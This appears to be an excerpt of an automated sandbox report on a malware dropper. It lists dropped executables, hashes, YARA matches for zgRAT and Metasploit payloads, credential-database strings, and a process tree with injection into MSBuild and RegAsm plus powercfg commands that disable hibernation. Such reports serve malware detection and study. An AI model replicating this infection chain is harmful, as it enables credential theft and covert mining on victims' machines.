Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66624820	9_2_66624820
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665E7810	9_2_665E7810
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_666158E0	9_2_666158E0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_666450C7	9_2_666450C7
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665FC0E0	9_2_665FC0E0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_666060A0	9_2_666060A0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6662B970	9_2_6662B970
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6664B170	9_2_6664B170
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665FA940	9_2_665FA940
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665ED960	9_2_665ED960
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6660D9B0	9_2_6660D9B0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66615190	9_2_66615190
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66632990	9_2_66632990
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665DC9A0	9_2_665DC9A0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\FCBFBGDBKJ.exe 07C09BA5A84F619E5B83A54298FFC58D20B00F14399C7A94B7F02B70EFC60F35
Source: Joe Sandbox View	Dropped File: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe 6FFD157EB781504EADD72996C2CDBD4881034FFB7F7D2BC4B96D4DAA61FB4D86
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process token adjusted: Security

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: String function: 666194D0 appears 90 times
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: String function: 6660CBE8 appears 134 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 424 -ip 424

Source: H1pBxuA3W1wJGbhYT2DZXaLH.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: crt[1].exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: H1pBxuA3W1wJGbhYT2DZXaLH.tmp.8.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: H1pBxuA3W1wJGbhYT2DZXaLH.tmp.8.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: H1pBxuA3W1wJGbhYT2DZXaLH.tmp.8.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: H1pBxuA3W1wJGbhYT2DZXaLH.tmp.8.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: H1pBxuA3W1wJGbhYT2DZXaLH.tmp.8.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: PowerExpertNT.exe.7.dr	Static PE information: Number of sections : 11 > 10
Source: WinTrackerSP.exe.7.dr	Static PE information: Number of sections : 11 > 10
Source: ExtreamFanV5.exe.7.dr	Static PE information: Number of sections : 11 > 10
Source: streamer[1].exe.0.dr	Static PE information: Number of sections : 12 > 10
Source: yTXn1eeuAPe6JeFa5Kfn6hMY.exe.0.dr	Static PE information: Number of sections : 12 > 10

Source: 1719859269.0326595_setup.exe, 00000000.00000003.2243578576.0000021663EC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs 1719859269.0326595_setup.exe
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234234346.0000021663EC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs 1719859269.0326595_setup.exe
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.00000216655EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenewsoftgnu.exe$ vs 1719859269.0326595_setup.exe
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234144752.0000021663D44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs 1719859269.0326595_setup.exe
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2243578576.0000021663F96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs 1719859269.0326595_setup.exe

Source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000000E.00000002.2560583044.000000C00023A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000E.00000002.2571364769.000000C000802000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: super[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9995950838414634
Source: super[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.993408203125
Source: super[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.989501953125
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9995950838414634
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: Section: ZLIB complexity 0.993408203125
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: Section: ZLIB complexity 0.989501953125
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0003120972938144
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9892077323717948
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9968646152862985
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9989420572916666
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.5
Source: ExtreamFanV5.exe.7.dr	Static PE information: Section: ZLIB complexity 1.0003120972938144
Source: ExtreamFanV5.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9892077323717948
Source: ExtreamFanV5.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9968646152862985
Source: ExtreamFanV5.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9989420572916666
Source: ExtreamFanV5.exe.7.dr	Static PE information: Section: .reloc ZLIB complexity 1.5
Source: PowerExpertNT.exe.7.dr	Static PE information: Section: ZLIB complexity 1.0003120972938144
Source: PowerExpertNT.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9892077323717948
Source: PowerExpertNT.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9968646152862985
Source: PowerExpertNT.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9989420572916666
Source: PowerExpertNT.exe.7.dr	Static PE information: Section: .reloc ZLIB complexity 1.5
Source: WinTrackerSP.exe.7.dr	Static PE information: Section: ZLIB complexity 1.0003120972938144
Source: WinTrackerSP.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9892077323717948
Source: WinTrackerSP.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9968646152862985
Source: WinTrackerSP.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9989420572916666
Source: WinTrackerSP.exe.7.dr	Static PE information: Section: .reloc ZLIB complexity 1.5
Source: AAAAKJKJEB.exe.9.dr	Static PE information: Section: ZLIB complexity 0.9981215846994536
Source: AAAAKJKJEB.exe.9.dr	Static PE information: Section: jkbeubqv ZLIB complexity 0.994320738549326
Source: amadka[1].exe.9.dr	Static PE information: Section: ZLIB complexity 0.9981215846994536
Source: amadka[1].exe.9.dr	Static PE information: Section: jkbeubqv ZLIB complexity 0.994320738549326

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@105/154@27/25

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Code function: 9_2_66637030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

9_2_66637030

Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe

Code function: 8_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

8_2_0040936C

Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe

Code function: 8_2_00409AD0 FindResourceA,SizeofResource,LoadResource,LockResource,

8_2_00409AD0

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

File created: C:\Users\user\Documents\SimpleAdobe

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Mutant created: \Sessions\1\BaseNamedObjects\IntelPowerExpert
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5664:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1216:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess424
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe

File created: C:\Users\user\AppData\Local\Temp\tmpSTLpopstart

Jump to behavior

Source: Yara match	File source: 31.0.mp3doctorfree32_64.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.3364376195.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.2392814904.0000000000401000.00000020.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-64K5G.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe, type: DROPPED

Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe

File opened: C:\Windows\system32\bd704f588fd57c093cfcafb6b1bb24c44baa43f242637e92cfc325a2e2d9dea3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

File read: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2719345291.00000000668DF000.00000002.00000001.01000000.00000022.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2674787069.000000001D528000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2713735314.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2719345291.00000000668DF000.00000002.00000001.01000000.00000022.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2674787069.000000001D528000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2713735314.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2719345291.00000000668DF000.00000002.00000001.01000000.00000022.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2674787069.000000001D528000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2713735314.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2719345291.00000000668DF000.00000002.00000001.01000000.00000022.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2674787069.000000001D528000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2713735314.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2719345291.00000000668DF000.00000002.00000001.01000000.00000022.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2674787069.000000001D528000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2713735314.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2719345291.00000000668DF000.00000002.00000001.01000000.00000022.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2674787069.000000001D528000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2713735314.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2674787069.000000001D528000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2713735314.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2428969553.00000000234A4000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462448584.0000000023498000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2674787069.000000001D528000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2713735314.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2674787069.000000001D528000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2713735314.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: 1719859269.0326595_setup.exe

ReversingLabs: Detection: 18%

Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe

String found in binary or memory: privacy.html]]></PrivacyAgreementUrl> <InstallTime>240</InstallTime> <AgreeUserLicense>0</AgreeUserLicense> <FoldBottom>1</FoldBottom> </Product>

Source: unknown	Process created: C:\Users\user\Desktop\1719859269.0326595_setup.exe "C:\Users\user\Desktop\1719859269.0326595_setup.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 424 -ip 424
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 284
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp "C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp" /SL5="$70066,5141152,54272,C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe"
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe .\Install.exe /bfYudidAVdU "385137" /S
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe .\Install.exe /iwYBYdidlHmT "525403" /S
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Process created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe "C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe" -i
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
